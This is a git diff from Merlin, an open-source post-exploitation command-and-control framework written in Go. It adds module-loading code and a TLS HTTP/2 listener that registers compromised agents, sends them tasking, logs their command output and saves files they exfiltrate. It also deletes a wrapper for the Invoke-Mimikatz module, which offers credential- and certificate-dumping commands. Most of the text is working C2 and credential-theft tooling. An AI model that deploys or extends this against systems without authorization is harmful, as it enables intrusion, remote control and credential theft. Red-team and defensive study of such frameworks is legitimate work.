+func (m *Module) ShowInfo(){
+	color.Yellow("Module:\r\n\t%s\r\n", m.Name)
+	color.Yellow("Platform:\r\n\t%s\\%s\\%s\r\n", m.Platform, m.Arch, m.Lang)
+	color.Yellow("Authors:")
+	for a := range m.Author {
+		color.Yellow("\t%s", m.Author[a])
+	}
+	color.Yellow("Description:\r\n\t%s", m.Description)
+	m.ShowOptions()
+	fmt.Println()
+	color.Yellow("Notes: %s", m.Notes)
+
+}
+
+// Create is module function used to instantiate a module object using the provided file path to a module's json file
+func Create(modulePath string) (Module, error) {
+	var m Module
+
+	// Read in the module's JSON configuration file
+	f, err := ioutil.ReadFile(modulePath)
+	if err != nil {
+		return m, err
+	}
+
+	// Unmarshal module's JSON message
+	var moduleJSON map[string]*json.RawMessage
+	errModule := json.Unmarshal(f, &moduleJSON)
+	if errModule != nil {
+		return m, errModule
+	}
+
+	// Determine all message types
+	var keys []string
+	for k := range moduleJSON {
+		keys = append(keys,k)
+	}
+
+	// Validate that module's JSON contains at least the base message
+	var containsBase bool
+	for i := range keys{
+		if keys[i] == "base" {
+			containsBase = true
+		}
+	}
+
+	// Marshal Base message type
+	if !containsBase {
+		return m, errors.New("the module's definition does not contain the 'BASE' message type")
+	}
+	errJSON := json.Unmarshal(*moduleJSON["base"], &m)
+	if errJSON != nil {
+		return m, errJSON
+	}
+
+	// Check for PowerShell configuration options
+	for k := range keys{
+		switch keys[k]{
+		case "base":
+		case "powershell":
+			k := marshalMessage(*moduleJSON["powershell"])
+			m.Powershell = (*json.RawMessage)(&k)
+			var p PowerShell
+			json.Unmarshal(k, &p)
+		}
+	}
+
+	_, errValidate := validateModule(m)
+	if errValidate != nil {
+		return m, errValidate
+	}
+	return m, nil
+}
+
+// validate function is used to check a module's configuration for errors
+func validateModule(m Module) (bool, error) {
+
+	// Validate Platform
+	switch strings.ToUpper(m.Platform) {
+	case "WINDOWS":
+	case "LINUX":
+	case "DARWIN":
+	default:
+		return false, errors.New("invalid 'platform' value provided in module file")
+	}
+
+	// Validate Architecture
+	switch strings.ToUpper(m.Arch){
+	case "X64":
+	case "X32":
+	default:
+		return false, errors.New("invalid 'arch' value provided in module file")
+	}
+	return true, nil
+}
+
+// marshalMessage is a generic function used to marshal JSON messages
+func marshalMessage(m interface{}) []byte {
+	k, err := json.Marshal(m)
+	if err != nil {
+		color.Red("There was an error marshaling the JSON object")
+		color.Red(err.Error())
+	}
+	return k
+}
\ No newline at end of file
diff --git a/pkg/modules/powershell/powersploit/Exfiltration/Invoke-Mimikatz.go b/pkg/modules/powershell/powersploit/Exfiltration/Invoke-Mimikatz.go
deleted file mode 100644
index 0c09a588..00000000
--- a/pkg/modules/powershell/powersploit/Exfiltration/Invoke-Mimikatz.go
+++ /dev/null
@@ -1,53 +0,0 @@
-// Merlin is a post-exploitation command and control framework.
-// This file is part of Merlin.
-// Copyright (C) 2017  Russel Van Tuyl
-
-// Merlin is free software: you can redistribute it and/or modify
-// it under the terms of the GNU General Public License as published by
-// the Free Software Foundation, either version 3 of the License, or
-// any later version.
-
-// Merlin is distributed in the hope that it will be useful,
-// but WITHOUT ANY WARRANTY; without even the implied warranty of
-// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-// GNU General Public License for more details.
-
-// You should have received a copy of the GNU General Public License
-// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.
-
-package Exfiltration
-
-import (
-	"github.com/ne0nd0g/merlin/pkg/modules"
-)
-
-var module = modules.Module{
-	Name:     "Invoke-Mimikatz",
-	Author:   append("Joe Bialek", "Benjamin DELPY `gentilkiwi`"),
-	Path:     "PowerSploit/Exfiltration/Invoke-Mimikatz.ps1",
-	Platform: "windows",
-	Arch:     "amd64",
-	Lang:     "powershell",
-	Notes:    "",
-}
-
-// Options is structure containing options that can be set for the module
-type Options struct {
-	Module    modules.Module
-	Command   []string
-	Arguments string
-}
-
-func (o Options) check() bool {
-
-	return true
-}
-
-func main() *Options {
-	o := Options{
-		Command:   append("DumpCreds", "DumpCerts", "Command", "ComputerName"),
-		Module:    module,
-		Arguments: "",
-	}
-	return o
-}
diff --git a/pkg/servers/http2/http2.go b/pkg/servers/http2/http2.go
new file mode 100644
index 00000000..ad9b4ecd
--- /dev/null
+++ b/pkg/servers/http2/http2.go
@@ -0,0 +1,259 @@
+// Merlin is a post-exploitation command and control framework.
+// This file is part of Merlin.
+// Copyright (C) 2018  Russel Van Tuyl
+
+// Merlin is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// any later version.
+
+// Merlin is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.
+
+package http2
+
+import (
+	// Standard
+	"net/http"
+	"fmt"
+	"encoding/json"
+	"path/filepath"
+	"os"
+	"encoding/base64"
+	"io/ioutil"
+	"time"
+	"crypto/tls"
+
+	// 3rd Party
+	"github.com/fatih/color"
+	
+	// Merlin
+	"github.com/Ne0nd0g/merlin/pkg/core"
+	"github.com/Ne0nd0g/merlin/pkg/agents"
+	"github.com/Ne0nd0g/merlin/pkg/logging"
+	"github.com/Ne0nd0g/merlin/pkg/messages"
+)
+
+func handler(w http.ResponseWriter, r *http.Request) {
+	if core.Verbose {
+		message("note", fmt.Sprintf("Received HTTP %s Connection from %s", r.Method, r.Host))
+		logging.Server(fmt.Sprintf("Received HTTP %s Connection from %s", r.Method, r.Host))
+	}
+
+	if core.Debug {
+		message("debug", fmt.Sprintf("HTTP Connection Details:"))
+		message("debug", fmt.Sprintf("Host: %s", r.Host))
+		message("debug", fmt.Sprintf("URI: %s", r.RequestURI))
+		message("debug", fmt.Sprintf("Method: %s", r.Method))
+		message("debug", fmt.Sprintf("Protocol: %s", r.Proto))
+		message("debug", fmt.Sprintf("Headers: %s", r.Header))
+		message("debug", fmt.Sprintf("TLS Negotiated Protocol: %s", r.TLS.NegotiatedProtocol))
+		message("debug", fmt.Sprintf("TLS Cipher Suite: %d", r.TLS.CipherSuite))
+		message("debug", fmt.Sprintf("TLS Server Name: %s", r.TLS.ServerName))
+		message("debug", fmt.Sprintf("Content Length: %d", r.ContentLength))
+
+		logging.Server(fmt.Sprintf("[DEBUG]HTTP Connection Details:"))
+		logging.Server(fmt.Sprintf("[DEBUG]Host: %s", r.Host))
+		logging.Server(fmt.Sprintf("[DEBUG]URI: %s", r.RequestURI))
+		logging.Server(fmt.Sprintf("[DEBUG]Method: %s", r.Method))
+		logging.Server(fmt.Sprintf("[DEBUG]Protocol: %s", r.Proto))
+		logging.Server(fmt.Sprintf("[DEBUG]Headers: %s", r.Header))
+		logging.Server(fmt.Sprintf("[DEBUG]TLS Negotiated Protocol: %s", r.TLS.NegotiatedProtocol))
+		logging.Server(fmt.Sprintf("[DEBUG]TLS Cipher Suite: %d", r.TLS.CipherSuite))
+		logging.Server(fmt.Sprintf("[DEBUG]TLS Server Name: %s", r.TLS.ServerName))
+		logging.Server(fmt.Sprintf("[DEBUG]Content Length: %d", r.ContentLength))
+	}
+
+	w.Header().Set("Access-Control-Allow-Origin", "*")
+
+	if r.Method == "POST" && r.ProtoMajor == 2 {
+
+		var payload json.RawMessage
+		j := messages.Base{
+			Payload: &payload,
+		}
+		json.NewDecoder(r.Body).Decode(&j)
+
+		if core.Debug {
+			message("debug",fmt.Sprintf("[DEBUG]POST DATA: %s", j))
+		}
+		switch j.Type {
+
+		case "InitialCheckIn":
+			var p messages.SysInfo
+			json.Unmarshal(payload, &p)
+			agents.InitialCheckIn(j, p)
+
+		case "StatusCheckIn":
+			w.Header().Set("Content-Type", "application/json")
+			x := agents.StatusCheckIn(j)
+			if core.Verbose {
+				message("note", fmt.Sprintf("[-]Sending " + x.Type + " message type to agent"))
+			}
+			json.NewEncoder(w).Encode(x)
+
+		case "CmdResults":
+			// TODO move to its own function
+			var p messages.CmdResults
+			json.Unmarshal(payload, &p)
+			agents.Log(j.ID, fmt.Sprintf("Results for job: %s", p.Job))
+
+			message("success", fmt.Sprintf("Results for job %s", p.Job))
+			if len(p.Stdout) > 0 {
+				agents.Log(j.ID, fmt.Sprintf("Command Results (stdout):\r\n%s", p.Stdout))
+				message("success", fmt.Sprintf("%s", p.Stdout))
+			}
+			if len(p.Stderr) > 0 {
+				agents.Log(j.ID, fmt.Sprintf("Command Results (stderr):\r\n%s", p.Stderr))
+				message("warn",fmt.Sprintf("%s", p.Stderr))
+			}
+
+		case "AgentInfo":
+			var p messages.AgentInfo
+			json.Unmarshal(payload, &p)
+			if core.Debug {
+				message("debug", fmt.Sprintf("AgentInfo JSON object: %s", p))
+			}
+			agents.Info(j, p)
+		case "FileTransfer":
+			var p messages.FileTransfer
+			json.Unmarshal(payload, &p)
+			if p.IsDownload {
+				agentsDir := filepath.Join(core.CurrentDir, "data", "agents")
+				_, f := filepath.Split(p.FileLocation) // We don't need the directory part for anything
+				if _, errD := os.Stat(agentsDir); os.IsNotExist(errD) {
+					message("","[!]There was an error locating the agent's directory")
+					message("",errD.Error())
+				}
+				message("success", fmt.Sprintf("Results for job %s", p.Job))
+				downloadBlob, downloadBlobErr := base64.StdEncoding.DecodeString(p.FileBlob)
+
+				if downloadBlobErr != nil {
+					message("","[!]There was an error decoding the fileBlob")
+					message("",downloadBlobErr.Error())
+				} else {
+					downloadFile := filepath.Join(agentsDir, j.ID.String(), f)
+					writingErr := ioutil.WriteFile(downloadFile, downloadBlob, 0644)
+					if writingErr != nil {
+						message("warn",fmt.Sprintf("There was an error writing to : %s", p.FileLocation))
+						message("warn",writingErr.Error())
+					} else {
+						message("success", fmt.Sprintf("Successfully downloaded file %s with a size of %d bytes from agent to %s",
+							p.FileLocation,
+							len(downloadBlob),
+							downloadFile))
+						agents.Log(j.ID, fmt.Sprintf("Successfully downloaded file %s with a size of %d bytes from" +
+							" agent to %s",
+							p.FileLocation,
+							len(downloadBlob),
+							downloadFile))
+					}
+				}
+			}
+		default:
+			message("warn",fmt.Sprintf("Invalid Activity: %s", j.Type))
+		}
+
+	} else if r.Method == "GET" {
+		// Should answer any GET requests
+		// Send 404
+		w.WriteHeader(404)
+	} else if r.Method == "OPTIONS" && r.ProtoMajor == 2 {
+		w.Header().Set("Access-Control-Allow-Methods", "POST")
+		w.Header().Set("Access-Control-Allow-Origin", "*")
+		w.Header().Set("Access-Control-Allow-Headers", "accept, content-type")
+	} else {
+		w.WriteHeader(404)
+	}
+}
+
+// StartListener starts an instance of the HTTP/2 server
+func StartListener(port string, ip string, crt string, key string, webpath string) {
+
+	logging.Server("Starting HTTP/2 Listener")
+	logging.Server(fmt.Sprintf("Address: %s:%s%s", ip, port, webpath))
+	logging.Server(fmt.Sprintf("x.509 Certificate %s", crt))
+	logging.Server(fmt.Sprintf("x.509 Key %s", key))
+
+	time.Sleep(45 * time.Millisecond) // Sleep to allow the shell to start up
+	// Check to make sure files exist
+	_, errCrt := os.Stat(crt)
+	if errCrt != nil {
+		message("warn", "There was an error importing the SSL/TLS x509 certificate")
+		message("warn", errCrt.Error())
+		return
+	}
+
+	_, errKey := os.Stat(key)
+	if errKey != nil {
+		message("warn","There was an error importing the SSL/TLS x509 key")
+		message("warn", errKey.Error())
+		logging.Server(fmt.Sprintf("There was an error importing the SSL/TLS x509 key\r\n%s", errKey.Error()))
+		return
+	}
+
+	cer, err := tls.LoadX509KeyPair(crt, key)
+
+	if err != nil {
+		message("warn", "There was an error importing the SSL/TLS x509 key pair")
+		message("warn", "Ensure a keypair is located in the data/x509 directory")
+		message("warn", err.Error())
+		logging.Server(fmt.Sprintf("There was an error importing the SSL/TLS x509 key pair\r\n%s",err.Error()))
+		return
+	}
+
+	// Configure TLS
+	config := &tls.Config{
+		Certificates: []tls.Certificate{cer},
+		MinVersion:   tls.VersionTLS12,
+		CipherSuites: []uint16{
+			tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
+			tls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
+			tls.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,
+		},
+		NextProtos: []string{"h2"},
+	}
+	http.HandleFunc(webpath, handler)
+
+	s := &http.Server{
+		Addr:           ip + ":" + port,
+		Handler:        nil,
+		ReadTimeout:    10 * time.Second,
+		WriteTimeout:   10 * time.Second,
+		MaxHeaderBytes: 1 << 20,
+		TLSConfig:      config,
+	}
+
+	// I shouldn't need to specify the certs as they are in the config
+	message("note", fmt.Sprintf("HTTPS Listener Started on %s:%s", ip, port))
+	err2 := s.ListenAndServeTLS(crt, key)
+	if err2 != nil {
+		message("warn", "There was an error starting the web server")
+		logging.Server(fmt.Sprintf("There was an error starting the web server\r\n%s", err2.Error()))
+		return
+	}
+	// TODO determine scripts path and load certs by their absolute path
+}
+
+// message is used to print a message to the command line
+func message (level string, message string) {
+	switch level {
+	case "info":
+		color.Cyan("[i]" + message)
+	case "note":
+		color.Yellow("[-]" + message)
+	case "warn":
+		color.Red("[!]" + message)
+	case "debug":
+		color.Red("[DEBUG]" + message)
+	case "success":
+		color.Green("[+]" + message)
+	default:
+		color.Red("[_-_]Invalid message level: " + message)
+	}
+}